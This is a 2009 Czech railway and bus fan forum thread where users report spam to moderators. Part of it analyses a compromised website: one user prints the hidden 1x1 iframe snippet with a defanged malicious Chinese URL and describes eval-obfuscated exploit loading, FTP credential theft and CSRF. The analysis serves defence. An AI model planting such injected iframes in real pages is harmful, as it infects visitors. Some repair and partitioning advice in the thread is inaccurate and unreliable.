Autor |
Příspěvek |
Šari
Moderátor
Číslo příspěvku: 4629 Registrován: 11-2005
| Odesláno Pátek, 10. dubna 2009 - 22:59:06 |
|
Díky, už není
FZF » Zlínka 810 271-7 "Šarinka" » Perla Zlínky 19. a 20.9.09 ® 110 let Zlínky ® těšíme se na Vaši návštěvu
|
|
Mauricio Registrovaný uživatel
Číslo příspěvku: 3247 Registrován: 4-2005
| Odesláno Neděle, 12. dubna 2009 - 19:40:57 |
|
Prosím zredukovat velikost a barvy... Pokud uznáte za vhodné. Díky. https://www.k-report.net/presmerovani/?prispevek=1381647
SOR LH12 - nejlepší český dálkový autobus na vnitrostátní linky. |
|
Číslo příspěvku: 3248 Registrován: 4-2005
| Odesláno Neděle, 12. dubna 2009 - 20:44:07 |
|
Jeho reakce v editu mi vůbec nevadí, naopak mě spíše pobavila, tak to tam nechce, už je to OK, zeditoval to sám.
|
Martinmarilynmanson
Registrovaný uživatel
Číslo příspěvku: 2800 Registrován: 12-2007
| Odesláno Neděle, 12. dubna 2009 - 21:11:07 |
|
https://www.k-report.net/presmerovani/?prispevek=1381761 Ač s tím zcela souhlasím, do autobusů to jaksi nepatří!
|
Krtek11
Registrovaný uživatel
Číslo příspěvku: 306 Registrován: 8-2008
| Odesláno Neděle, 12. dubna 2009 - 21:40:49 |
|
MMM: Njn, fanoušek energie to přehnal s pivem.
Skype:CZkrtek11 ICQ:438187387(krtek11) mail: krtek11@spoluzaci.cz
|
|
Šari
Moderátor
Číslo příspěvku: 4652 Registrován: 11-2005
| Odesláno Neděle, 12. dubna 2009 - 22:14:39 |
|
Zchladil sem ho...
FZF » Zlínka 810 271-7 "Šarinka" » Perla Zlínky 19. a 20.9.09 ® 110 let Zlínky ® těšíme se na Vaši návštěvu
|
|
Martin_zlivský
Moderátor
Číslo příspěvku: 48744 Registrován: 4-2003
| Odesláno Neděle, 12. dubna 2009 - 22:50:35 |
|
Krtek11: Kdyby se aspoň dokázal podepsat, hrdina...
Karotenovič Carotsson s mrkvistorovou regulací z Mrkvanova: Nejdokonalejším geometrickým útvarem je mrkvoid! Hledáte nejlepší zvuk na síti? www.danceradio.cz
|
|
Martinmarilynmanson
Registrovaný uživatel
Číslo příspěvku: 2801 Registrován: 12-2007
| Odesláno Neděle, 12. dubna 2009 - 23:04:20 |
|
MZ: To šlo hned poznat kdo to byl
|
Martin_zlivský
Moderátor
Číslo příspěvku: 48749 Registrován: 4-2003
| Odesláno Neděle, 12. dubna 2009 - 23:06:52 |
|
Doufám, že si to aspoň uvědomí...
Karotenovič Carotsson s mrkvistorovou regulací z Mrkvanova: Nejdokonalejším geometrickým útvarem je mrkvoid! Hledáte nejlepší zvuk na síti? www.danceradio.cz
|
|
Kalanis
Registrovaný uživatel
Číslo příspěvku: 888 Registrován: 12-2006
| Odesláno Pondělí, 13. dubna 2009 - 01:18:20 |
|
Může mu někdo přistřihnout křídla? Je to tam poněkud nevhodné.
|
Džejár_jujing
Registrovaný uživatel
Číslo příspěvku: 63 Registrován: 8-2008
| Odesláno Pondělí, 13. dubna 2009 - 01:23:16 |
|
Kalanis: a proč by to bylo nevhodné? Protože si někdo hraje na mistra světa a nesnese jiný názor? To je celkem ubohý, ale on už Šari holt je takový Mimochodem absolutně nevíš, o co jde, tak nesuď.
JUJING - OJL Ropu kupujte zasadne U JUJINGU!!! |
|
Karosa_b731 Registrovaný uživatel
Číslo příspěvku: 1696 Registrován: 2-2007
| Odesláno Pondělí, 13. dubna 2009 - 21:01:30 |
|
Spam...
|
Martin_zlivský
Moderátor
Číslo příspěvku: 48766 Registrován: 4-2003
| Odesláno Pondělí, 13. dubna 2009 - 21:08:02 |
|
Kdyby server nešel tak líně, byl už pryč...
|
|
Medvídek
Registrovaný uživatel
Číslo příspěvku: 45 Registrován: 1-2009
| Odesláno Úterý, 14. dubna 2009 - 11:27:42 |
|
https://www.k-report.net/presmerovani/?prispevek=1382815 V tomto príspevku je odkaz na web, na ktorom je vírus!
Nástupca Davidosh-a e-mail : busmaniak@gmail.com SKYPE : medvídek |
|
Martin_zlivský
Moderátor
Číslo příspěvku: 48788 Registrován: 4-2003
| Odesláno Úterý, 14. dubna 2009 - 12:28:08 |
|
Spíš je debilní kód. Bohužel nemám teď možnost to prověřit.
|
|
Václavs
Registrovaný uživatel
Číslo příspěvku: 545 Registrován: 10-2005
| Odesláno Úterý, 14. dubna 2009 - 14:41:42 |
|
Je tam červ.
Železnice Českého Krasu - Historický projekt tratí západně od Prahy, stav tratí odpovídá začátku devadesátých let. Pro Microsoft Train Simulator. Blížší informace zde. Skype: Na120ce |
|
Martin_zlivský
Moderátor
Číslo příspěvku: 48794 Registrován: 4-2003
| Odesláno Úterý, 14. dubna 2009 - 14:48:24 |
|
OK, odkaz raději zneškodním.
|
|
Pavel2 Registrovaný uživatel
Číslo příspěvku: 5732 Registrován: 8-2002
| Odesláno Úterý, 14. dubna 2009 - 16:55:44 |
|
co na tom webu bylo za virus? zkoumal jste to někdo? taky už jsem takovou věc viděl a !!prozatím!! nebezpečná nebyla, html kód webu obsahoval vloženej neviditenej iframe s odkazem na nějakej nedostupnej čínskej web. zajímá mě jak vypadalo tuto, MZ, mašinko, jestli ten link máte, můžete mi ho pls prsknout do mejlu?
|
Martin_zlivský
Moderátor
Číslo příspěvku: 48796 Registrován: 4-2003
| Odesláno Úterý, 14. dubna 2009 - 17:01:45 |
|
Bohužel mě nenapadlo ho uchovat.
|
|
Kalanis
Registrovaný uživatel
Číslo příspěvku: 889 Registrován: 12-2006
| Odesláno Úterý, 14. dubna 2009 - 18:54:52 |
|
Pavel: Fakt máš zájem? Myslím, že to mám někde uložený na budoucí pitvání. Ale neručím za to. Je to Iframe o veliosti 1x1 pixel a obsahem je čínská stránka s adekvátně poničeným flashem a PDF. A Javascript náhodně vybírá, který takto upravený soubor má prohlížeč otevřít. Základem ale byl robot, který napích spousty stránek a za tag BODY narval ten iframe. Když tag nenašel, tak to nacpal na konec stránky. Týkalo se to stránek index.(htm,php) . Což na úklid bylo třeba u mne trochu delší (co omezená složka, to 404). Jinak útok pomocí týhle díry proběhl kolem 5.4. a od 7.4. jsou stránky indickým providerem zrušeny.
|
Číslo příspěvku: 5733 Registrován: 8-2002
| Odesláno Úterý, 14. dubna 2009 - 22:00:52 |
|
kalanis: mě se ten iframe objevil na jednom z firemních webů. trochu jsem na to zíral a zafénoval na hosting. tam mi řekli, že u nich chyba není, ale už se párkrát stalo, že virus na webech měli. poučili mě, že iframe se na web dostal nejspíš ze zavirovanýho počítače s win/totalcmd (nebo jiným ftp klientem), kterej měl uloženej login včetně hesla. prej existuje několik virů, který kradou hesla z wcx_ftp.ini a podobných fajlů a nabourávají weby. teď už jen stačí, aby nějaký pako umístilo na url z iframů dalšího šmejda a bude o zábavu postaráno. mě se to stalo 2x s cca 14denním odstupem a při druhým incidentu;-) jsem změnil heslo na ftp. přičemž zatím jsem velmi omezil okruh počítačů, na kterých se heslo vyskytuje, protože vážně netuším, ze kterýho kompu se web "nakazil". vlastně ani nevím, kolik lidí si první login na web uložilo. byli i mimo firmu, takže se to pak těžko honí. navíc mám obavu, že se ten šmejd může šířit po síťových discích a defaultních sdíleních, což by taky bylo zábavný. takže momentálně jsem ve vyčkávacím režimu. zatím pokud na nakaženej web vezu, vyřvává na kompu rezidentní avast a stánku nedovolí natáhnout. jen by mě zajímalo, jestli se dá vytvořit stránka třeba s javascriptem, flashem nebo čímkoliv jiným, aby mi to nepozorovaně do počítače uložilo spícího agenta, kterej by mohl být aktivovanej třeba vlezením na další speciálně zmrvenou stránku... jinak na to url z iframu se nedalo dostat, web byl nedostupnej. končilo to nějkým cgi a myslím že i s parametrem za otazníkem.
|
Kuba_j Registrovaný uživatel
Číslo příspěvku: 1368 Registrován: 8-2005
| Odesláno Úterý, 14. dubna 2009 - 22:01:26 |
|
A na jaký web vůbec byl ten odkaz? Kdyžtak prosím ten odkaz zaslat přes SZ.
|
Martin_zlivský
Moderátor
Číslo příspěvku: 48800 Registrován: 4-2003
| Odesláno Středa, 15. dubna 2009 - 10:48:58 |
|
Sem ten odkaz klidně dejte...
|
|
Číslo příspěvku: 5737 Registrován: 8-2002
| Odesláno Středa, 15. dubna 2009 - 11:27:31 |
|
MZ: zatím nevím co ten link dělá, takže jen upravenej: http://www.domainname.cn/skript.cgi?parametr00 FF napíše že Spojení se serverem bylo v průběhu načítání stránky ukončeno. nevím co to dělá, nemám zdroják, prostě ani prd. dneska jsem ho prej měl nakoupenej na dotyčným webu znova. ftp heslo bylo na dvou počítačích, ty jsou čistý, avast s aktuální db na nich nic nenašel. tudíž buď ten šmejd leze po síťových discích a sdíleních anebo je to nějakej dobře zakuklenej neviditelnej rootkit anebo kombinace obojího. v každým případě se zdá, že při výrobě tohohle kousku někdo po dlouhý době používal hlavu.
|
Kalanis
Registrovaný uživatel
Číslo příspěvku: 891 Registrován: 12-2006
| Odesláno Středa, 15. dubna 2009 - 15:35:18 |
|
Takže reálný je tenhle: hxxp://lotante.cn/in.cgi?income37 (xx => tt) a celý je to balený takhle: <--iframe src="hxxp://lotante.cn/in.cgi?income37" width=1 height=1 style="visibility: hidden"--><--/iframe--> visibility:hidden => viditelnost:skryto. Je tam Javascript a obligátní Eval (aneb spusť to, co si nageneruješ). Doporučuju zkoumat jen při vypnutém Javascriptu, objektech ActiveX a pluginech. Pak to nic neudělá. Prázdná stránka neznamená automaticky, že se nic netalo. Doufám, že MZ nebude vadit, když sem postupně naházím zjištěné údaje (reverznutý Eval).
|
Číslo příspěvku: 5740 Registrován: 8-2002
| Odesláno Středa, 15. dubna 2009 - 15:53:02 |
|
mě by HLAVNĚ zajímalo odkud se to vzalo, jak se to jmenuje, co to dělá a jak to najít a zlikvidovat plus jaxe proti tomu ochránit do budoucna (neukládání hesel už je jasný).
|
Kalanis
Registrovaný uživatel
Číslo příspěvku: 892 Registrován: 12-2006
| Odesláno Středa, 15. dubna 2009 - 17:26:20 |
|
Tak obrana zrovna proti tomuhle je poněkud kombinovaná. Ti parchanit mají upravený jeden obrázek ve svém Outlook Express (a právě OE nejde z Win rozumně odstranit) a pomocí něho detekují, zda se na to nemají . Pak to spustí Snapshot Viewer Control, také z OE,(co to dělá, netřeba říkat), který komunikuje s další částí OE. No a každých 3000 ms to posílá info na ten server, kde si k tomu přišel, do LDAP (a ten zakázat neumím). Dál to spustí infikované PDF (je tam zabalený javascript) anebo SWF (podobná díra). A ta stáhne další chlív. Obrana: Pomocí LiveCD Linuxu umazat celý Outlook Express (či nahradit soubory prázdnými, nic nevykonávajícími) včetně zálohy v dllcache, v Adobe Readeru zakázat sctipty a aktualizovat u Adobe SWF player. Systém disku NESMÍ být NTFS (problémy při zápisu či úpravách) Celý to divadlo s Outlookem stojí a padá na provádění příkazu Eval a jeho obsahu (a ten by zrovna potřeboval zakázat, aspoň by to nemohli maskovat).
|
Martin_zlivský
Moderátor
Číslo příspěvku: 48803 Registrován: 4-2003
| Odesláno Středa, 15. dubna 2009 - 18:36:27 |
|
Moc pěkný...
|
|
21272 Registrovaný uživatel
Číslo příspěvku: 4550 Registrován: 9-2005
| Odesláno Čtvrtek, 16. dubna 2009 - 17:06:39 |
|
Teď jsem 5x formátoval disk, tak si to střihnu pošestý případně... Jinak nestačí dát normálně Outlook Express odinstalovat? (Příspěvek byl editován uživatelem 21272.)
|
Kalanis
Registrovaný uživatel
Číslo příspěvku: 893 Registrován: 12-2006
| Odesláno Čtvrtek, 16. dubna 2009 - 18:05:28 |
|
Ne, stále má pozůstatky v systému. Večer budu louskat nebezpečný obsah toho PDF, držte mi palce. 21272: Pokud nemáš nějakou critical-app, bez které bys nevydržel a která nemá alternativu bez woken či se jí nechce do wokení emulace Wine (pro více info UTFG), tak zkus na domácí použití live cd Linuxu Mandriva. Den dva budeš ohrnovat nos a zvykat si, ale pak ji nejspíš nainstaluješ. Pokud ale chceš dále Widle, tak jako prohlížeč nainstaluj Firefox a okamžitě si sežeň doplněk NoScript. Doplněk měj stále zapnutý, jen na prověřených stránkách ho můžeš vypnout. Pokud vám šéfstvo nedovolí nic jiného, než IE, tak nezbývá než si sehnat něco na obalení jeho jádra a zmnožení snadno přístupných funkcí. Mne se osvědčil Avant Browser. Při standartním nastavení na něj příjde jenom správce, a ten by za snahu mít od virů pokoj nadávat neměl. Můžeš v něm skripty, Javu i ActiveX mít jak dlouhodobě vypnuté, nebo vše blokovat jen při otevření neznámé či zavirované stránky. Dále doporučuju mít v pohotovosti antivirák, firewall a adware searchs (třeba Avast, NOD, Comodo, Spybot, AdAware), ty některé případy taky chytají před branami.
|
Číslo příspěvku: 4551 Registrován: 9-2005
| Odesláno Čtvrtek, 16. dubna 2009 - 19:06:21 |
|
A jak poznám co mi půjde v tom emulátoru? Prostě ho zkusit, nebo existuje seznam aplikací? Třeba takové MSTS nechodí pořádně na windows, natož pak třeba asi na linuxu.
|
Kalanis
Registrovaný uživatel
Číslo příspěvku: 894 Registrován: 12-2006
| Odesláno Pátek, 17. dubna 2009 - 08:53:56 |
|
Seznam existuje: odkaz konkrétně MSTS
|
Číslo příspěvku: 4553 Registrován: 9-2005
| Odesláno Pátek, 17. dubna 2009 - 17:50:10 |
|
A ještě poslední věc - můžu mít zatím souběžně Windows a Linux?
|
Kalanis
Registrovaný uživatel
Číslo příspěvku: 897 Registrován: 12-2006
| Odesláno Pátek, 17. dubna 2009 - 18:33:33 |
|
Pokud budeš mít Linux na jiném psychickém disku než Windows (klidně i druhý v pořadí), tak naprosto v klidu. Psychický proto, že na jeden disk fyzický je klidně pokrájen na víc jednotek psychických. Je to časté na noteboocích a ničemu to nevadí. Jinak máš dost smůlu a čeká tě značné pálení všech svých dat do záloh. Jinak jak Live vyhovuje? Pokud jsi si ale Linux přes Live neohmatal, tak to fofrem udělej nebo nebo na to kašli. A kašli na to i pokud máš všechny disky pouze se systémem souborů NTFS. Linux se ti na nich nenahodí, narozdíl od historické FAT, kterou přežije. Ovladač NTFS není v jádru a je zaveden později, než by bylo ke startu třeba. Dál se pak neručí za přístupnost Linuxových systémů souborů pod Windows. Tolik potíže více OS na 1 PC (a to buď rád, že na něm nemáš kombinaci WXP, W98 a Linuxu - FAT only).
|
Pvvs
Registrovaný uživatel
Číslo příspěvku: 3791 Registrován: 7-2003
| Odesláno Pátek, 17. dubna 2009 - 18:43:40 |
|
Psychicky . Snad logicky partition... A vetsina distro si zvlada ukrojit i z uz zabrany partition, staci , kdyz je na ni volny misto. NTFS mu je sumak, pac se startuje z boot sektoru , kam si nahraje zavadec. Pak uz si taha data ze svy partition. Jeste nejaky pohadky na dobrou noc ? Chcu se zasmat..
S trpělivostí učitele zvláštní školy dojdeš nejdál. |
|
Číslo příspěvku: 3284 Registrován: 4-2005
| Odesláno Sobota, 18. dubna 2009 - 10:26:59 |
|
Jeste nejaky pohadky na dobrou noc ? Chcu se zasmat.. Myslíš si, že každý ví, o čem je tu řeč? :-D
|
Vojtik Registrovaný uživatel
Číslo příspěvku: 2451 Registrován: 2-2007
| Odesláno Sobota, 18. dubna 2009 - 12:49:29 |
|
Je potřeba hlásit uživatele 3034 atd.? Nebo to má redakce pod stálým dozorem? (cokoli v Brně)
|
Kalanis
Registrovaný uživatel
Číslo příspěvku: 898 Registrován: 12-2006
| Odesláno Sobota, 18. dubna 2009 - 14:19:12 |
|
Díky, Mauricio. PvvS: Jo, když profíkovi řeknu, že FTP LIST mi přítomnost file v inode hda hlásí, ale http stále řve 404, tak to pochopí. Ale tohle nemůžu říct laikovi. Oproti tomu můžu přirovnat rozložení primárních a rozšířených partition disku ke krájení dortu a už je princip jasný i laikovi (ačkoliv je v praxi tohle provedené po datové spirále na jednotce a ne výřezy alá dort, kteréžto jsou ale pro tvorbu grafu snažší). 21272: Pokud si nejseš jist, jaký máš systém souborů, tak ve Windows je to snad stále všude stejné. Tento počítač -> pravé tlačítko myši na ikoně disku -> vlastnosti -> systém souborů je zde oznámen
|
Číslo příspěvku: 4554 Registrován: 9-2005
| Odesláno Sobota, 18. dubna 2009 - 18:17:44 |
|
Jsem si jist, předevírem (nebo o den předtím) jsem tam dával NTFS .
|
Masinka
Moderátor
Číslo příspěvku: 4661 Registrován: 6-2002
| Odesláno Sobota, 18. dubna 2009 - 21:13:29 |
|
Vojtik: Tentokrát zkusíme trochu tvrdší opatření |
Kalanis
Registrovaný uživatel
Číslo příspěvku: 899 Registrován: 12-2006
| Odesláno Neděle, 19. dubna 2009 - 00:40:33 |
|
Tak další virový report: Ten skrytý formulář nejen že může natahovat svinstva skrz PDF, SWF, ale i obsahovat kódy na útok CSRF, což je jeden, ze své podstaty, nejhnusnějších a nejpodlejších útoků. To znamená, že pokud někdo bude mít při otevření takto infikované stránky otevřeno jiné okno téhož prohlížeče (třeba s mailem, administrací stránek, etc.), může dojít k tomu, že při cílení tohoto útoku na danou aplikaci otevřenou v původním okně útočník změní dle potřeb cokoliv, co v dané aplikaci změnit potřebuje. Na představu je to poměrně složitý. Útok vychází z konstrukcí prohlížečů a samotného http (tedy není imunní třeba ani Linux). Útočník má iframe alá ten, co tu už máme. A v tom iframe je podvržený, předpřipravený a "správně" vyplněný vybraný formulář. A formulář se díky javascriptu okamžitě po otevření stránky odešle na danou stránku napadané aplikace. Ale s právy jaké má uživatel, co jí má v tu chvíli otevřenou. Obrana proti tomuto útoku je natolik komplikovaná, že jí většina administračních rozhraní ani nevede. Fakticky ale proti tomu stačí, když prostě člověk bezhlavě nekliká na všechny odkazy, pokud je někde přihlášen a něco dostane. Pak pokud není napíchnutá přímo stránka s aplikací (a to už je na pováženou a pak je spousta jiných cest na těžbu), tak není šance tento útok provést. Takže POZOR!
|
Martin_zlivský
Moderátor
Číslo příspěvku: 48871 Registrován: 4-2003
| Odesláno Neděle, 19. dubna 2009 - 20:20:11 |
|
Když už tu řešíte tak pěkné téma - mohl byste někdo mrknout na tohle? Avast! řve jak splašenej při každý operaci s tím souborem, spustit mne to nenechá (TC hlásí chybu programu). Našel jsme to kdesi na disku, ani netuším, co to vlastně je (je to z 23.8.2006, 23:57).
|
|
Kalanis
Registrovaný uživatel
Číslo příspěvku: 901 Registrován: 12-2006
| Odesláno Pondělí, 20. dubna 2009 - 16:06:58 |
|
odkaz Nic totálně kritického, jen adware dial monitor. Ale zase pokud bys ho měl nainstalovanýho a měl dial-up, tak se asi nedoplatíš. Thawte consulting je podle něj z Kapskýho města a on se chce k němu připojit. A navíc to píchlo českej NetMonitor. (Vše je krásně čitelné na konci souboru a to ani nepotřebuju IDA pro.) Vytvoří to nějakou třídu v registru, naháčkuje se na síť a už jen čeká. Edit: Tak se stránky poněkud nezdají. Whois dotaz hlásí, že thawte.com je dnes v USA. Asi byl tenkrát využit na útok a dnes má vše čisté (SiteAdvisor). (Příspěvek byl editován uživatelem Kalanis.)
|
Martin_zlivský
Moderátor
Číslo příspěvku: 48892 Registrován: 4-2003
| Odesláno Pondělí, 20. dubna 2009 - 16:31:34 |
|
OK, díky. Deska s dial-up je místo v PC v šuplíku (nechcete někdo?), takže se asi jen tak nedočká. Jen by mě zajímalo, co to dělá v NetMonitoru.
|
|
Bugear Registrovaný uživatel
Číslo příspěvku: 979 Registrován: 8-2005
| Odesláno Pondělí, 20. dubna 2009 - 21:53:30 |
|
@Kalanis: Thawte bude podepisovatel, v dobách dialerů byl pro tyto účely hodně oblíbený. (Dokonce je to dcera VeriSignu, jak jsem teď zjistil.)
|
Sergeilbc
Registrovaný uživatel
Číslo příspěvku: 5179 Registrován: 10-2004
| Odesláno Středa, 22. dubna 2009 - 16:11:53 |
|
Frontální útok kindermafie na Liberec...
VEB Verkehrsbetriebe der Stadt Dresden - Ihr Partner im städtischen Nahverkehr |
|
Martin_zlivský
Moderátor
Číslo příspěvku: 48910 Registrován: 4-2003
| Odesláno Středa, 22. dubna 2009 - 17:28:17 |
|
Uvidíme, třeba si nechá říct.
|
|
Pvvs
Registrovaný uživatel
Číslo příspěvku: 3795 Registrován: 7-2003
| Odesláno Sobota, 25. dubna 2009 - 18:35:29 |
|
kindermafian z korozy utoci https://www.k-report.net/discus/messages/2484/295.html?1240677222# POST1393281
S trpělivostí učitele zvláštní školy dojdeš nejdál. |
|
Medvídek_intouro Registrovaný uživatel
Číslo příspěvku: 1276 Registrován: 12-2007
| Odesláno Pondělí, 27. dubna 2009 - 13:04:36 |
|
odkaz
|
Stanley
Registrovaný uživatel
Číslo příspěvku: 4002 Registrován: 2-2005
| Odesláno Úterý, 28. dubna 2009 - 20:20:33 |
|
Spam v Autobusech v ČR, Karosách a Citelisech.
Pane faraři, Vy to pochopite, Vy jste svaty človek! |
|
Lc_736__c_954 Registrovaný uživatel
Číslo příspěvku: 2336 Registrován: 6-2006
| Odesláno Úterý, 28. dubna 2009 - 20:24:01 |
|
Konkrétně odkaz na tyhle stránky.
|
Ares1
Registrovaný uživatel
Číslo příspěvku: 5491 Registrován: 4-2006
| Odesláno Úterý, 28. dubna 2009 - 21:30:38 |
|
udělejte něco s tím Pdodočekalem nebo co je to za blba
pyrotechnik:uvidíte-li mě utíkat,snažte se me předběhnout.... www.mhdvmb.wz.cz doprava v severovýchodních Čechách a nejen tam
|
|
Lc_736__c_954 Registrovaný uživatel
Číslo příspěvku: 2339 Registrován: 6-2006
| Odesláno Úterý, 28. dubna 2009 - 21:35:03 |
|
Generální ředitel firmy HDČR a.s. Petr Dočekal vyhlašuje konkurz na míso ředitel firmy HDČR a.s.
|
Mr_proper Registrovaný uživatel
Číslo příspěvku: 906 Registrován: 11-2006
| Odesláno Úterý, 28. dubna 2009 - 22:24:57 |
|
Pan generální P. Dočekal na těch stránkách nemá vůbec nic, takže ani nechápu, proč na ně dával odkaz hned do tří diskuzí.
|
Masinka
Moderátor
Číslo příspěvku: 4679 Registrován: 6-2002
| Odesláno Úterý, 28. dubna 2009 - 22:32:57 |
|
Příspěvky jsem zlikvidoval a přihlásil se do konkurzu |
Magiq
Registrovaný uživatel
Číslo příspěvku: 6120 Registrován: 3-2005
| Odesláno Středa, 29. dubna 2009 - 07:01:02 |
|
ad.Masinka: Tak to se setkáme na konkurzu. |
Hladík
Registrovaný uživatel
Číslo příspěvku: 452 Registrován: 10-2008
| Odesláno Středa, 29. dubna 2009 - 16:53:53 |
|
Zde se zase prosazují názory mladých.
|
Vojtik Registrovaný uživatel
Číslo příspěvku: 2471 Registrován: 2-2007
| Odesláno Středa, 29. dubna 2009 - 17:10:06 |
|
Světelná návěstidla, bobiny, Rakousko.... Někdo mlátí do klávesnice.
|
ťuk Neregistrovaný host Odeslán z: 195.113.124.6
| Odesláno Středa, 29. dubna 2009 - 17:33:37 |
|
Pokud vím, tak "Kočky" se zavřely kvůli šmíráctví... https://www.k-report.net/presmerovani/?prispevek=1396522 Je Belina jenom tak neuvěřitelně natvrdlý, nebo to dělá schválně? |
Václavs
Registrovaný uživatel
Číslo příspěvku: 553 Registrován: 10-2005
| Odesláno Středa, 29. dubna 2009 - 17:49:57 |
|
Zase tu sou spamy z DUJP v Pardubicích: Sdělení pro redakci, Bobiny, světelná návěstidla a možná něco navíc (Příspěvek byl editován uživatelem Václavs.)
Železnice Českého Krasu - Historický projekt tratí západně od Prahy, stav tratí odpovídá začátku devadesátých let. Pro Microsoft Train Simulator. Blížší informace zde. Skype: Na120ce |
|